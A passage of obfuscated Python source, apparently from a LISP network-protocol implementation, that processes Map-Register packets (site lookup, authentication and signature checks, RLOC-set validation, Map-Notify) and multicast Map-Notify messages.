if 84 - 84: oO0o
ooo000O0O = None
iI111iIII1I = packet
OOooOo0o0oOoo = [ ]
O000oOooO0oo = I1ooo0o00o0Oooo . record_count
for iIi1I1 in range ( O000oOooO0oo ) :
oO000oOoO0 = lisp_eid_record ( )
oOOo = lisp_rloc_record ( )
packet = oO000oOoO0 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Register packet" )
return
if 14 - 14: II111iiii + OOooOOo * Ii1I * I1IiiI + OOooOOo . OOooOOo
oO000oOoO0 . print_record ( " " , False )
if 5 - 5: oO0o + OoooooooOO
if 88 - 88: oO0o + OOooOOo
if 14 - 14: I11i / i1IIi
if 56 - 56: OoooooooOO
oOOOO0ooo = lisp_site_eid_lookup ( oO000oOoO0 . eid , oO000oOoO0 . group ,
False )
if 59 - 59: I1ii11iIi11i + OoO0O00
i11iiii11iIii = oOOOO0ooo . print_eid_tuple ( ) if oOOOO0ooo else None
if 11 - 11: o0oOOo0O0Ooo
if 77 - 77: o0oOOo0O0Ooo / iIii1I11I1II1 * iIii1I11I1II1 / o0oOOo0O0Ooo * iII111i
if 26 - 26: Ii1I
if 1 - 1: OoOoOO00 . o0oOOo0O0Ooo + Oo0Ooo % Oo0Ooo * I1ii11iIi11i
if 50 - 50: IiII / i1IIi . I1ii11iIi11i
if 75 - 75: I11i * oO0o + OoooooooOO . iII111i + OoO0O00
if 44 - 44: II111iiii
if ( oOOOO0ooo and oOOOO0ooo . accept_more_specifics == False ) :
if ( oOOOO0ooo . eid_record_matches ( oO000oOoO0 ) == False ) :
O0Ii1IiiiI = oOOOO0ooo . parent_for_more_specifics
if ( O0Ii1IiiiI ) : oOOOO0ooo = O0Ii1IiiiI
if 32 - 32: I1Ii111 % oO0o * iII111i * OOooOOo
if 45 - 45: oO0o / O0
if 5 - 5: OoO0O00 / O0
if 64 - 64: I11i / i1IIi
if 68 - 68: Ii1I / oO0o - iII111i
if 52 - 52: I11i / OoO0O00 - Ii1I
if 11 - 11: OoooooooOO - i11iIiiIii - I1ii11iIi11i / o0oOOo0O0Ooo - Ii1I
if 16 - 16: ooOoO0o + O0
Ii1I111IiI11I = ( oOOOO0ooo and oOOOO0ooo . accept_more_specifics )
if ( Ii1I111IiI11I ) :
Oo0 = lisp_site_eid ( oOOOO0ooo . site )
Oo0 . dynamic = True
Oo0 . eid . copy_address ( oO000oOoO0 . eid )
Oo0 . group . copy_address ( oO000oOoO0 . group )
Oo0 . parent_for_more_specifics = oOOOO0ooo
Oo0 . add_cache ( )
Oo0 . inherit_from_ams_parent ( )
oOOOO0ooo . more_specific_registrations . append ( Oo0 )
oOOOO0ooo = Oo0
else :
oOOOO0ooo = lisp_site_eid_lookup ( oO000oOoO0 . eid , oO000oOoO0 . group ,
True )
if 85 - 85: I1ii11iIi11i . I1IiiI - I11i
if 92 - 92: II111iiii / OOooOOo + I1ii11iIi11i * OoooooooOO
Ii1i1 = oO000oOoO0 . print_eid_tuple ( )
if 89 - 89: ooOoO0o / ooOoO0o
if ( oOOOO0ooo == None ) :
IIIiiIIiII11 = bold ( "Site not found" , False )
lprint ( " {} for EID {}{}" . format ( IIIiiIIiII11 , green ( Ii1i1 , False ) ,
", matched non-ams {}" . format ( green ( i11iiii11iIii , False ) if i11iiii11iIii else "" ) ) )
if 61 - 61: iIii1I11I1II1
if 26 - 26: i11iIiiIii + OoO0O00 - i1IIi / OOooOOo
if 71 - 71: OOooOOo . i1IIi
if 48 - 48: ooOoO0o - Ii1I - I11i
if 70 - 70: O0 * I11i . i1IIi - ooOoO0o
packet = oOOo . end_of_rlocs ( packet , oO000oOoO0 . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 93 - 93: OoooooooOO / o0oOOo0O0Ooo
continue
if 61 - 61: II111iiii / i1IIi . I1ii11iIi11i % iIii1I11I1II1
if 66 - 66: iIii1I11I1II1 % OoOoOO00 + i1IIi * i11iIiiIii * OoooooooOO
ooo000O0O = oOOOO0ooo . site
if 36 - 36: iII111i - OoO0O00 + I1IiiI + Ii1I . OoooooooOO
if ( Ii1I111IiI11I ) :
iIIi1iI1I1IIi = oOOOO0ooo . parent_for_more_specifics . print_eid_tuple ( )
lprint ( " Found ams {} for site '{}' for registering prefix {}" . format ( green ( iIIi1iI1I1IIi , False ) , ooo000O0O . site_name , green ( Ii1i1 , False ) ) )
if 75 - 75: oO0o * Oo0Ooo * O0
else :
iIIi1iI1I1IIi = green ( oOOOO0ooo . print_eid_tuple ( ) , False )
lprint ( " Found {} for site '{}' for registering prefix {}" . format ( iIIi1iI1I1IIi , ooo000O0O . site_name , green ( Ii1i1 , False ) ) )
if 22 - 22: ooOoO0o / OoooooooOO . II111iiii / Ii1I * OoO0O00 . i1IIi
if 62 - 62: oO0o % Ii1I - Ii1I
if 16 - 16: OoO0O00 - O0 - OOooOOo - I11i % OoOoOO00
if 7 - 7: I1Ii111 / OoOoOO00 . II111iiii
if 9 - 9: I11i . I11i . OoooooooOO
if 42 - 42: iII111i / oO0o / iII111i * OoO0O00
if ( ooo000O0O . shutdown ) :
lprint ( ( " Rejecting registration for site '{}', configured in " +
"admin-shutdown state" ) . format ( ooo000O0O . site_name ) )
packet = oOOo . end_of_rlocs ( packet , oO000oOoO0 . rloc_count )
continue
if 25 - 25: OoOoOO00 - II111iiii + II111iiii . Ii1I * II111iiii
if 12 - 12: IiII / Ii1I
if 54 - 54: Oo0Ooo + Ii1I % OoooooooOO * OOooOOo / OoOoOO00
if 39 - 39: I1IiiI % i11iIiiIii % Ii1I
if 59 - 59: ooOoO0o % OoO0O00 / I1IiiI - II111iiii + OoooooooOO * i11iIiiIii
if 58 - 58: IiII / Oo0Ooo + o0oOOo0O0Ooo
if 71 - 71: Ii1I - IiII
if 2 - 2: OoOoOO00 % IiII % OoO0O00 . i1IIi / I1Ii111 - iIii1I11I1II1
o00oO = I1ooo0o00o0Oooo . key_id
if ( ooo000O0O . auth_key . has_key ( o00oO ) ) :
oO0oOOoo0OO0 = ooo000O0O . auth_key [ o00oO ]
else :
oO0oOOoo0OO0 = ""
if 25 - 25: iII111i / iII111i
if 7 - 7: II111iiii * Ii1I * OoO0O00 / o0oOOo0O0Ooo
O0Oo0O000 = lisp_verify_auth ( oO0ooOoOooO00o00 , I1ooo0o00o0Oooo . alg_id ,
I1ooo0o00o0Oooo . auth_data , oO0oOOoo0OO0 )
iIiIII1 = "dynamic " if oOOOO0ooo . dynamic else ""
if 9 - 9: IiII . I11i . I1Ii111 / i1IIi * OoOoOO00 - O0
O0Oo = bold ( "passed" if O0Oo0O000 else "failed" , False )
o00oO = "key-id {}" . format ( o00oO ) if o00oO == I1ooo0o00o0Oooo . key_id else "bad key-id {}" . format ( I1ooo0o00o0Oooo . key_id )
if 3 - 3: O0 / iIii1I11I1II1 % IiII + I11i
lprint ( " Authentication {} for {}EID-prefix {}, {}" . format ( O0Oo , iIiIII1 , green ( Ii1i1 , False ) , o00oO ) )
if 43 - 43: Oo0Ooo % I11i
if 53 - 53: OoOoOO00 % OoooooooOO * o0oOOo0O0Ooo % OoooooooOO
if 47 - 47: iIii1I11I1II1 - OOooOOo + I1ii11iIi11i * ooOoO0o + Oo0Ooo + OoO0O00
if 64 - 64: OoOoOO00 - OoOoOO00 . OoooooooOO + ooOoO0o
if 100 - 100: ooOoO0o . OoooooooOO % i1IIi % OoO0O00
if 26 - 26: OoOoOO00 * IiII
Oo000O = True
o00OoOO = ( lisp_get_eid_hash ( oO000oOoO0 . eid ) != None )
if ( o00OoOO or oOOOO0ooo . require_signature ) :
Ooo00oooOoO = "Required " if oOOOO0ooo . require_signature else ""
Ii1i1 = green ( Ii1i1 , False )
I1II = lisp_find_sig_in_rloc_set ( packet , oO000oOoO0 . rloc_count )
if ( I1II == None ) :
Oo000O = False
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}, no signature found" ) . format ( Ooo00oooOoO ,
# ooOoO0o * OOooOOo / I11i % I11i / OoooooooOO . I1Ii111
bold ( "failed" , False ) , Ii1i1 ) )
else :
Oo000O = lisp_verify_cga_sig ( oO000oOoO0 . eid , I1II )
O0Oo = bold ( "passed" if Oo000O else "failed" , False )
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}" ) . format ( Ooo00oooOoO , O0Oo , Ii1i1 ) )
if 70 - 70: I1ii11iIi11i % I1ii11iIi11i / oO0o
if 85 - 85: OoOoOO00 % I11i / Oo0Ooo + I11i - Oo0Ooo
if 20 - 20: IiII
if 81 - 81: Oo0Ooo / I1Ii111
if ( O0Oo0O000 == False or Oo000O == False ) :
packet = oOOo . end_of_rlocs ( packet , oO000oOoO0 . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 20 - 20: o0oOOo0O0Ooo + ooOoO0o % i1IIi
continue
if 51 - 51: iII111i - ooOoO0o
if 32 - 32: IiII - i11iIiiIii
if 41 - 41: Ii1I % Ii1I * oO0o - I11i + iIii1I11I1II1 . ooOoO0o
if 30 - 30: Ii1I * iII111i . II111iiii / i1IIi
if 77 - 77: oO0o . IiII + I1ii11iIi11i . i1IIi
if 49 - 49: I1Ii111 . OoooooooOO / o0oOOo0O0Ooo - iII111i - iII111i - i11iIiiIii
if ( I1ooo0o00o0Oooo . merge_register_requested ) :
O0Ii1IiiiI = oOOOO0ooo
O0Ii1IiiiI . inconsistent_registration = False
if 37 - 37: OOooOOo
if 79 - 79: I1Ii111 - OoO0O00 + ooOoO0o + oO0o . i11iIiiIii + i1IIi
if 32 - 32: IiII . ooOoO0o / OoO0O00 / iII111i . iIii1I11I1II1 % IiII
if 28 - 28: I1Ii111 + OoooooooOO + IiII . ooOoO0o . I1IiiI / oO0o
if 66 - 66: Ii1I - I11i + Oo0Ooo . ooOoO0o
if ( oOOOO0ooo . group . is_null ( ) ) :
if ( O0Ii1IiiiI . site_id != I1ooo0o00o0Oooo . site_id ) :
O0Ii1IiiiI . site_id = I1ooo0o00o0Oooo . site_id
O0Ii1IiiiI . registered = False
O0Ii1IiiiI . individual_registrations = { }
O0Ii1IiiiI . registered_rlocs = [ ]
lisp_registered_count -= 1
if 89 - 89: IiII . II111iiii / OoO0O00 + I1ii11iIi11i * i11iIiiIii
if 85 - 85: o0oOOo0O0Ooo - Oo0Ooo / I1Ii111
if 100 - 100: OoO0O00 * iIii1I11I1II1 - IiII . i1IIi % i11iIiiIii % Oo0Ooo
o0Oo = source . address + I1ooo0o00o0Oooo . xtr_id
if ( oOOOO0ooo . individual_registrations . has_key ( o0Oo ) ) :
oOOOO0ooo = oOOOO0ooo . individual_registrations [ o0Oo ]
else :
oOOOO0ooo = lisp_site_eid ( ooo000O0O )
oOOOO0ooo . eid . copy_address ( O0Ii1IiiiI . eid )
oOOOO0ooo . group . copy_address ( O0Ii1IiiiI . group )
oOOOO0ooo . encrypt_json = O0Ii1IiiiI . encrypt_json
O0Ii1IiiiI . individual_registrations [ o0Oo ] = oOOOO0ooo
if 22 - 22: ooOoO0o - OOooOOo
else :
oOOOO0ooo . inconsistent_registration = oOOOO0ooo . merge_register_requested
if 90 - 90: i11iIiiIii . i11iIiiIii - iIii1I11I1II1
if 20 - 20: ooOoO0o - i11iIiiIii
if 23 - 23: OoO0O00 + I1IiiI / I1ii11iIi11i * I1ii11iIi11i % ooOoO0o
oOOOO0ooo . map_registers_received += 1
if 83 - 83: I1IiiI * i11iIiiIii - I1ii11iIi11i + I11i
if 33 - 33: OoO0O00 . OoooooooOO % iII111i / oO0o * Ii1I + ooOoO0o
if 29 - 29: oO0o
if 21 - 21: i11iIiiIii . o0oOOo0O0Ooo
if 78 - 78: Oo0Ooo
IiiiIi = ( oOOOO0ooo . is_rloc_in_rloc_set ( source ) == False )
if ( oO000oOoO0 . record_ttl == 0 and IiiiIi ) :
lprint ( " Ignore deregistration request from {}" . format ( red ( source . print_address_no_iid ( ) , False ) ) )
if 77 - 77: oO0o % Oo0Ooo % O0
continue
if 51 - 51: IiII % IiII + OOooOOo . II111iiii / I1ii11iIi11i
if 4 - 4: o0oOOo0O0Ooo % I1IiiI * o0oOOo0O0Ooo * OoOoOO00 - Ii1I
if 61 - 61: OoooooooOO - OoOoOO00 . O0 / ooOoO0o . Ii1I
if 41 - 41: Oo0Ooo / OoOoOO00 % I1Ii111 - O0
if 19 - 19: I1IiiI % I1Ii111 - O0 . iIii1I11I1II1 . I11i % O0
if 88 - 88: ooOoO0o
oo00ooo0o0 = oOOOO0ooo . registered_rlocs
oOOOO0ooo . registered_rlocs = [ ]
if 29 - 29: IiII / OOooOOo
if 39 - 39: O0 + II111iiii
if 94 - 94: OOooOOo % I1ii11iIi11i % O0 + iII111i
if 62 - 62: iIii1I11I1II1 . OoOoOO00 / iIii1I11I1II1 + IiII
I1ii1Iii1I1ii1 = packet
for oO00000o0OO0 in range ( oO000oOoO0 . rloc_count ) :
oOOo = lisp_rloc_record ( )
packet = oOOo . decode ( packet , None , oOOOO0ooo . encrypt_json )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 64 - 64: O0
oOOo . print_record ( " " )
if 71 - 71: iIii1I11I1II1 % OoOoOO00
if 83 - 83: ooOoO0o + I1Ii111 - OoooooooOO
if 55 - 55: OoooooooOO * O0 - II111iiii / IiII
if 18 - 18: II111iiii % O0 - o0oOOo0O0Ooo * ooOoO0o
if ( len ( ooo000O0O . allowed_rlocs ) > 0 ) :
oo0o00OO = oOOo . rloc . print_address ( )
if ( ooo000O0O . allowed_rlocs . has_key ( oo0o00OO ) == False ) :
lprint ( ( " Reject registration, RLOC {} not " + "configured in allowed RLOC-set" ) . format ( red ( oo0o00OO , False ) ) )
if 74 - 74: I11i . oO0o + I11i * o0oOOo0O0Ooo / O0
if 55 - 55: OoO0O00 / i11iIiiIii / o0oOOo0O0Ooo
oOOOO0ooo . registered = False
packet = oOOo . end_of_rlocs ( packet ,
oO000oOoO0 . rloc_count - oO00000o0OO0 - 1 )
break
if 19 - 19: ooOoO0o * iII111i
if 38 - 38: ooOoO0o
if 35 - 35: o0oOOo0O0Ooo * IiII * Oo0Ooo
if 34 - 34: I11i - OoooooooOO % i1IIi + I1IiiI
if 14 - 14: I1IiiI . o0oOOo0O0Ooo / I1Ii111
if 67 - 67: OoooooooOO . oO0o * OoOoOO00 - OoooooooOO
I1II = lisp_rloc ( )
I1II . store_rloc_from_record ( oOOo , None , source )
if 32 - 32: oO0o
if 72 - 72: I1IiiI
if 34 - 34: ooOoO0o % II111iiii / ooOoO0o
if 87 - 87: Oo0Ooo
if 7 - 7: iIii1I11I1II1
if 85 - 85: iIii1I11I1II1 . O0
if ( source . is_exact_match ( I1II . rloc ) ) :
I1II . map_notify_requested = I1ooo0o00o0Oooo . map_notify_requested
if 43 - 43: II111iiii / OoOoOO00 + OOooOOo % Oo0Ooo * OOooOOo
if 62 - 62: ooOoO0o * OOooOOo . I11i + Oo0Ooo - I1Ii111
if 48 - 48: I1Ii111 * Oo0Ooo % OoO0O00 % Ii1I
if 8 - 8: OoO0O00 . OoO0O00
if 29 - 29: I11i + OoooooooOO % o0oOOo0O0Ooo - I1Ii111
oOOOO0ooo . registered_rlocs . append ( I1II )
if 45 - 45: II111iiii - OOooOOo / oO0o % O0 . iII111i . iII111i
if 82 - 82: iIii1I11I1II1 % Oo0Ooo * i1IIi - I1Ii111 - I1ii11iIi11i / iII111i
i1II11I11III = ( oOOOO0ooo . do_rloc_sets_match ( oo00ooo0o0 ) == False )
if 12 - 12: I1ii11iIi11i % Ii1I * OoOoOO00 . iIii1I11I1II1 * I1Ii111 - OoOoOO00
if 33 - 33: OoO0O00 * I1IiiI / i1IIi
if 88 - 88: Ii1I / ooOoO0o - I11i % OoO0O00 * iII111i
if 47 - 47: i11iIiiIii + Oo0Ooo % oO0o % O0
if 98 - 98: oO0o - O0 / iII111i % oO0o % I1IiiI / i1IIi
if 61 - 61: ooOoO0o + II111iiii
if ( I1ooo0o00o0Oooo . map_register_refresh and i1II11I11III and
oOOOO0ooo . registered ) :
lprint ( " Reject registration, refreshes cannot change RLOC-set" )
oOOOO0ooo . registered_rlocs = oo00ooo0o0
continue
if 54 - 54: OoOoOO00 * o0oOOo0O0Ooo . OoO0O00
if 53 - 53: oO0o % OoO0O00 / OoO0O00 / I11i * Oo0Ooo
if 13 - 13: i1IIi % iIii1I11I1II1 - iII111i - I1IiiI - IiII + iIii1I11I1II1
if 22 - 22: IiII - OOooOOo + I1ii11iIi11i
if 64 - 64: OoOoOO00
if 79 - 79: IiII
if ( oOOOO0ooo . registered == False ) :
oOOOO0ooo . first_registered = lisp_get_timestamp ( )
lisp_registered_count += 1
if 65 - 65: Oo0Ooo - i11iIiiIii * OoOoOO00 . I1Ii111 . iIii1I11I1II1
oOOOO0ooo . last_registered = lisp_get_timestamp ( )
oOOOO0ooo . registered = ( oO000oOoO0 . record_ttl != 0 )
oOOOO0ooo . last_registerer = source
if 48 - 48: iIii1I11I1II1 - oO0o / OoO0O00 + O0 . Ii1I + I1Ii111
if 17 - 17: OoOoOO00 . Oo0Ooo - I1Ii111 / I1Ii111 + I11i % i1IIi
if 31 - 31: OoooooooOO . O0 / OoO0O00 . I1Ii111
if 41 - 41: OoooooooOO + iII111i . OOooOOo
oOOOO0ooo . auth_sha1_or_sha2 = OOOO00OO0O0o
oOOOO0ooo . proxy_reply_requested = I1ooo0o00o0Oooo . proxy_reply_requested
oOOOO0ooo . lisp_sec_present = I1ooo0o00o0Oooo . lisp_sec_present
oOOOO0ooo . map_notify_requested = I1ooo0o00o0Oooo . map_notify_requested
oOOOO0ooo . mobile_node_requested = I1ooo0o00o0Oooo . mobile_node
oOOOO0ooo . merge_register_requested = I1ooo0o00o0Oooo . merge_register_requested
if 73 - 73: oO0o + i1IIi + i11iIiiIii / I1ii11iIi11i
oOOOO0ooo . use_register_ttl_requested = I1ooo0o00o0Oooo . use_ttl_for_timeout
if ( oOOOO0ooo . use_register_ttl_requested ) :
oOOOO0ooo . register_ttl = oO000oOoO0 . store_ttl ( )
else :
oOOOO0ooo . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
if 100 - 100: I1IiiI % ooOoO0o % OoooooooOO / i11iIiiIii + i11iIiiIii % IiII
oOOOO0ooo . xtr_id_present = I1ooo0o00o0Oooo . xtr_id_present
if ( oOOOO0ooo . xtr_id_present ) :
oOOOO0ooo . xtr_id = I1ooo0o00o0Oooo . xtr_id
oOOOO0ooo . site_id = I1ooo0o00o0Oooo . site_id
if 39 - 39: Ii1I % o0oOOo0O0Ooo + OOooOOo / iIii1I11I1II1
if 40 - 40: iIii1I11I1II1 / iII111i % OOooOOo % i11iIiiIii
if 57 - 57: II111iiii % OoO0O00 * i1IIi
if 19 - 19: ooOoO0o . iIii1I11I1II1 + I1ii11iIi11i + I1ii11iIi11i / o0oOOo0O0Ooo . Oo0Ooo
if 9 - 9: II111iiii % OoooooooOO
if ( I1ooo0o00o0Oooo . merge_register_requested ) :
if ( O0Ii1IiiiI . merge_in_site_eid ( oOOOO0ooo ) ) :
OO0O0O00Oo . append ( [ oO000oOoO0 . eid , oO000oOoO0 . group ] )
if 4 - 4: i1IIi * i11iIiiIii % OoooooooOO + OoOoOO00 . oO0o
if ( I1ooo0o00o0Oooo . map_notify_requested ) :
lisp_send_merged_map_notify ( lisp_sockets , O0Ii1IiiiI , I1ooo0o00o0Oooo ,
oO000oOoO0 )
if 95 - 95: I1ii11iIi11i * OoOoOO00 % o0oOOo0O0Ooo / O0 + ooOoO0o % OOooOOo
if 48 - 48: i1IIi + IiII - iIii1I11I1II1 . i11iIiiIii % OOooOOo + I1ii11iIi11i
if 95 - 95: ooOoO0o + OoOoOO00 . II111iiii + Ii1I
if ( i1II11I11III == False ) : continue
if ( len ( OO0O0O00Oo ) != 0 ) : continue
if 81 - 81: OoooooooOO / OOooOOo / Oo0Ooo
OOooOo0o0oOoo . append ( oOOOO0ooo . print_eid_tuple ( ) )
if 26 - 26: iII111i
if 93 - 93: Oo0Ooo + I1IiiI % OoOoOO00 / OOooOOo / I1ii11iIi11i
if 6 - 6: IiII
if 68 - 68: Oo0Ooo
if 83 - 83: OOooOOo / iIii1I11I1II1 . OoO0O00 - oO0o % Oo0Ooo
if 30 - 30: Ii1I . OoOoOO00 / oO0o . OoO0O00
if 93 - 93: i11iIiiIii
oO000oOoO0 = oO000oOoO0 . encode ( )
oO000oOoO0 += I1ii1Iii1I1ii1
i1I1i = [ oOOOO0ooo . print_eid_tuple ( ) ]
lprint ( " Changed RLOC-set, Map-Notifying old RLOC-set" )
if 33 - 33: i1IIi % OoooooooOO + Oo0Ooo % I1IiiI / ooOoO0o
for I1II in oo00ooo0o0 :
if ( I1II . map_notify_requested == False ) : continue
if ( I1II . rloc . is_exact_match ( source ) ) : continue
lisp_build_map_notify ( lisp_sockets , oO000oOoO0 , i1I1i , 1 , I1II . rloc ,
LISP_CTRL_PORT , I1ooo0o00o0Oooo . nonce , I1ooo0o00o0Oooo . key_id ,
I1ooo0o00o0Oooo . alg_id , I1ooo0o00o0Oooo . auth_len , ooo000O0O , False )
if 40 - 40: IiII % IiII
if 9 - 9: I1IiiI * i1IIi + OOooOOo * OoOoOO00
if 8 - 8: iII111i
if 51 - 51: I1IiiI
if 72 - 72: ooOoO0o / I1ii11iIi11i . Ii1I * iII111i . iIii1I11I1II1
lisp_notify_subscribers ( lisp_sockets , oO000oOoO0 , oOOOO0ooo . eid , ooo000O0O )
if 35 - 35: OoO0O00 . OoOoOO00 % O0 * OoO0O00
if 68 - 68: OOooOOo
if 87 - 87: IiII * IiII - OoO0O00 / I1ii11iIi11i + OOooOOo / i11iIiiIii
if 21 - 21: o0oOOo0O0Ooo / oO0o + oO0o + Oo0Ooo / o0oOOo0O0Ooo
if 39 - 39: i11iIiiIii - OoO0O00 - i11iIiiIii / OoooooooOO
if ( len ( OO0O0O00Oo ) != 0 ) :
lisp_queue_multicast_map_notify ( lisp_sockets , OO0O0O00Oo )
if 15 - 15: i1IIi . iII111i + IiII / I1ii11iIi11i - i1IIi / iII111i
if 27 - 27: OoOoOO00 / OoooooooOO + i1IIi % iIii1I11I1II1 / OoO0O00
if 73 - 73: I1ii11iIi11i / OoOoOO00 / IiII + oO0o
if 73 - 73: I11i * o0oOOo0O0Ooo * I1IiiI . OoooooooOO % I1Ii111
if 9 - 9: oO0o % I1Ii111 . O0 + I1ii11iIi11i - Ii1I - I1ii11iIi11i
if 57 - 57: i11iIiiIii
if ( I1ooo0o00o0Oooo . merge_register_requested ) : return
if 21 - 21: iIii1I11I1II1 / I1IiiI / iII111i
if 19 - 19: Oo0Ooo / iIii1I11I1II1 / I11i
if 71 - 71: iIii1I11I1II1 * I1IiiI
if 35 - 35: O0
if 10 - 10: Ii1I - I1Ii111 / Oo0Ooo + O0
if ( I1ooo0o00o0Oooo . map_notify_requested and ooo000O0O != None ) :
lisp_build_map_notify ( lisp_sockets , iI111iIII1I , OOooOo0o0oOoo ,
I1ooo0o00o0Oooo . record_count , source , sport , I1ooo0o00o0Oooo . nonce ,
I1ooo0o00o0Oooo . key_id , I1ooo0o00o0Oooo . alg_id , I1ooo0o00o0Oooo . auth_len ,
ooo000O0O , True )
if 67 - 67: Ii1I % i11iIiiIii . Oo0Ooo
return
if 78 - 78: I1IiiI - iIii1I11I1II1
if 20 - 20: i11iIiiIii % I1IiiI % OoOoOO00
if 85 - 85: I11i + OoOoOO00 * O0 * O0
if 92 - 92: i11iIiiIii
if 16 - 16: I11i . ooOoO0o - Oo0Ooo / OoO0O00 . i1IIi
if 59 - 59: ooOoO0o - ooOoO0o % I11i + OoO0O00
if 88 - 88: Ii1I - ooOoO0o . Oo0Ooo
if 83 - 83: I11i + Oo0Ooo . I1ii11iIi11i * I1ii11iIi11i
if 80 - 80: i1IIi * I11i - OOooOOo / II111iiii * iIii1I11I1II1
if 42 - 42: OoOoOO00 . I11i % II111iiii
def lisp_process_multicast_map_notify ( packet , source ) :
Ii1ii1 = lisp_map_notify ( "" )
packet = Ii1ii1 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 19 - 19: OoooooooOO
if 31 - 31: I11i . OoOoOO00 - O0 * iII111i % I1Ii111 - II111iiii
Ii1ii1 . print_notify ( )
if ( Ii1ii1 . record_count == 0 ) : return
if 21 - 21: OOooOOo . Oo0Ooo - i1IIi
ooOoo0o0oO = Ii1ii1 . eid_records
if 21 - 21: i1IIi / ooOoO0o % ooOoO0o - IiII * Oo0Ooo
for iIi1I1 in range ( Ii1ii1 . record_count ) :
oO000oOoO0 = lisp_eid_record ( )
ooOoo0o0oO = oO000oOoO0 . decode ( ooOoo0o0oO )
if ( packet == None ) : return
oO000oOoO0 . print_record ( " " , False )
if 93 - 93: OoO0O00 + O0
if 36 - 36: i1IIi * oO0o
if 51 - 51: iIii1I11I1II1 / o0oOOo0O0Ooo % OOooOOo * Oo0Ooo . I1ii11iIi11i - oO0o
if 91 - 91: OOooOOo % OoooooooOO
o0oO0o00 = lisp_map_cache_lookup ( oO000oOoO0 . eid , oO000oOoO0 . group )
if ( o0oO0o00 == None ) :
o0O000O , oOo0oo , IIIi1i1iIIIi = lisp_allow_gleaning ( oO000oOoO0 . eid , oO000oOoO0 . group ,
None )
if ( o0O000O == False ) : continue
if 52 - 52: I11i
o0oO0o00 = lisp_mapping ( oO000oOoO0 . eid , oO000oOoO0 . group , [ ] )
o0oO0o00 . add_cache ( )
if 37 - 37: iIii1I11I1II1 - I1IiiI
if 25 - 25: i1IIi . OoO0O00 - Ii1I
if 42 - 42: O0 * iII111i . i1IIi / i11iIiiIii + Ii1I
if 80 - 80: O0 + II111iiii + oO0o . Oo0Ooo * i1IIi
if 8 - 8: Ii1I
if 82 - 82: OOooOOo * Ii1I + I1ii11iIi11i . OoO0O00
if 15 - 15: O0
if ( o0oO0o00 . gleaned ) :
lprint ( "Ignore Map-Notify for gleaned {}" . format ( green ( o0oO0o00 . print_eid_tuple ( ) , False ) ) )
if 44 - 44: Ii1I . Oo0Ooo . I1Ii111 + oO0o
continue
if 32 - 32: OOooOOo - II111iiii + IiII * iIii1I11I1II1 - Oo0Ooo
if 25 - 25: ooOoO0o
o0oO0o00 . mapping_source = None if source == "lisp-etr" else source
o0oO0o00 . map_cache_ttl = oO000oOoO0 . store_ttl ( )
if 33 - 33: Oo0Ooo
if 11 - 11: I11i
if 55 - 55: i11iIiiIii * OoOoOO00 - OoOoOO00 * OoO0O00 / iII111i
if 64 - 64: iIii1I11I1II1 . Ii1I * Oo0Ooo - OoO0O00
if 74 - 74: I1IiiI / o0oOOo0O0Ooo
if ( len ( o0oO0o00 . rloc_set ) != 0 and oO000oOoO0 . rloc_count == 0 ) :
o0oO0o00 . rloc_set = [ ]
o0oO0o00 . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , o0oO0o00 )
lprint ( "Update {} map-cache entry with no RLOC-set" . format ( green ( o0oO0o00 . print_eid_tuple ( ) , False ) ) )
if 53 - 53: iIii1I11I1II1 * oO0o
continue
if 43 - 43: IiII * Oo0Ooo / OOooOOo % oO0o
if 11 - 11: OoOoOO00 * Oo0Ooo / I11i * OOooOOo
i1i1iIIiI = o0oO0o00 . rtrs_in_rloc_set ( )
if 12 - 12: i1IIi + I1ii11iIi11i - ooOoO0o / I1Ii111 - iII111i
if 43 - 43: o0oOOo0O0Ooo - oO0o - i1IIi - iII111i
if 61 - 61: o0oOOo0O0Ooo % oO0o / I1ii11iIi11i . Ii1I % II111iiii
if 22 - 22: iIii1I11I1II1 - OoooooooOO
if 8 - 8: ooOoO0o % i11iIiiIii
for oO00000o0OO0 in range ( oO000oOoO0 . rloc_count ) :
oOOo = lisp_rloc_record ( )
ooOoo0o0oO = oOOo . decode ( ooOoo0o0oO , None )
oOOo . print_record ( " " )
if ( oO000oOoO0 . group . is_null ( ) ) : continue
if ( oOOo . rle == None ) : continue
if 41 - 41: I1Ii111 . ooOoO0o - i11iIiiIii + Ii1I . OOooOOo . OoOoOO00
if 70 - 70: i1IIi % OoOoOO00 / iII111i + i11iIiiIii % ooOoO0o + IiII
if 58 - 58: OOooOOo / i11iIiiIii . Oo0Ooo % iII111i
if 92 - 92: OoOoOO00 / ooOoO0o % iII111i / iIii1I11I1II1
if 73 - 73: O0 % i11iIiiIii
ii = o0oO0o00 . rloc_set [ 0 ] . stats if len ( o0oO0o00 . rloc_set ) != 0 else None
if 32 - 32: i11iIiiIii / OOooOOo / Ii1I . OoO0O00 . I1Ii111
if 83 - 83: O0 - Oo0Ooo + iIii1I11I1II1
if 49 - 49: II111iiii - ooOoO0o
if 50 - 50: I1IiiI % II111iiii * iIii1I11I1II1
I1II = lisp_rloc ( )
I1II . store_rloc_from_record ( oOOo , None , o0oO0o00 . mapping_source )
if ( ii != None ) : I1II . stats = copy . deepcopy ( ii )
if 39 - 39: i1IIi % IiII
if ( i1i1iIIiI and I1II . is_rtr ( ) == False ) : continue
if 64 - 64: I11i / O0 + i1IIi * II111iiii
o0oO0o00 . rloc_set = [ I1II ]
o0oO0o00 . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , o0oO0o00 )
if 20 - 20: iIii1I11I1II1
lprint ( "Update {} map-cache entry with RLE {}" . format ( green ( o0oO0o00 . print_eid_tuple ( ) , False ) ,
# i11iIiiIii
I1II . rle . print_rle ( False , True ) ) )
if 43 - 43: OOooOOo
if 79 - 79: iII111i % Oo0Ooo . i1IIi % ooOoO0o
return
if 93 - 93: OoOoOO00
if 49 - 49: i1IIi * OOooOOo % I11i * Ii1I . I1Ii111 * iIii1I11I1II1
if 72 - 72: ooOoO0o
